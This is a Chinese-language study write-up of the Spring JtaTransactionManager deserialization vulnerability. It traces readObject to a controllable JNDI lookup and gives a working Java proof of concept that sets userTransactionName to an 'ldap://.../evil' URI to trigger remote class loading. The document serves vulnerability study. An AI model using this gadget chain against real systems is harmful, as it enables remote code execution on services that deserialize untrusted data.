漏洞原理
Spring框架的JtaTransactionManager类中重写了readObject方法,这个方法最终会调用到JNDI中的lookup()方法,关键是里面的参数可控,这就导致了攻击者可以利用JNDI注入中的lookup()参数注入,传入恶意URI地址指向攻击者的RMI注册表服务,以使受害者客户端加载绑定在攻击者RMI注册表服务上的恶意类,从而实现远程代码执行。
环境依赖
<dependency>
<groupId>org.springframework</groupId>
<artifactId>spring-tx</artifactId>
<version>4.2.4.RELEASE</version>
</dependency>
<dependency>
<groupId>org.springframework</groupId>
<artifactId>spring-context</artifactId>
<version>4.2.4.RELEASE</version>
</dependency>
<dependency>
<groupId>javax.transaction</groupId>
<artifactId>javax.transaction-api</artifactId>
<version>1.2</version>
</dependency>
流程分析
漏洞入口在org/springframework/transaction/jta/JtaTransactionManager.java的readObject方法
跟进initUserTransactionAndTransactionManager
跟进lookupUserTransaction,这里调用了lookup
跟进lookup方法
继续跟进lookup方法,这里调用的是ctx的lookup方法,ctx是一个Context类型,往后追踪ctx,发现ctx其实是InitialContext类的实例,所以这里我们控制name的值就能直接打JNDI注入了
name就是JtaTransactionManager的属性userTransactionName,我们可以反射修改它的值
package org.example;
import org.springframework.transaction.jta.JtaTransactionManager;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
public class Main {
public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, ClassNotFoundException {
JtaTransactionManager jtaTransactionManager = new JtaTransactionManager();
Field userTransactionName = JtaTransactionManager.class.getDeclaredField("userTransactionName");
userTransactionName.setAccessible(true);
userTransactionName.set(jtaTransactionManager, "ldap://127.0.0.1:1099/evil");
// 序列化
ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("test.bin"));
oos.writeObject(jtaTransactionManager);
// 反序列化
byte[] bytes = Files.readAllBytes(Paths.get("D:\\Java安全学习\\SpringJNDI\\test.bin"));
ByteArrayInputStream bis = new ByteArrayInputStream(bytes);
ObjectInputStream obj = new ObjectInputStream(bis);
obj.readObject();
}
}
成功注入
rmi也是同理,把ldap换成rmi就行了,至于恶意服务端怎么搭建,之前的文章有讲过,这里就不再复述